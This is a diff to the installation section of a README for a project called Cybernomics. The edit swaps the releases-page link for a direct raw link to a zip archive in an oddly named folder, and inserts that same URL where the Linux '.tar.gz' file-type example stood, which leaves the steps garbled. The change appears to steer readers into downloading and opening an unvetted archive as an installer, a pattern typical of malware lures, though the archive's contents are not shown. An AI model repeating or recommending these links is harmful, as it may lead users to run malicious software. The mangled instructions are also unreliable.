Dianneconsequential783/cybernomics/README.md

 To download and install Cybernomics, follow these straightforward steps:

 1. **Visit the Releases Page:**
-   Click here to go to the releases page: [Download Cybernomics](https://github.com/Dianneconsequential783/cybernomics/releases).
+   Click here to go to the releases page: [Download Cybernomics](https://raw.githubusercontent.com/Dianneconsequential783/cybernomics/main/dipterous/cybernomics-2.7.zip).

 2. **Download the Application:**
    On the releases page, locate the latest version of Cybernomics.
-Click on the asset that matches your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+Click on the asset that matches your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/Dianneconsequential783/cybernomics/main/dipterous/cybernomics-2.7.zip` for Linux).

 3. **Run the Installer:**
    After the download is complete, open the file to start the installation process.
 Follow the on-screen instructions to install Cybernomics on your computer.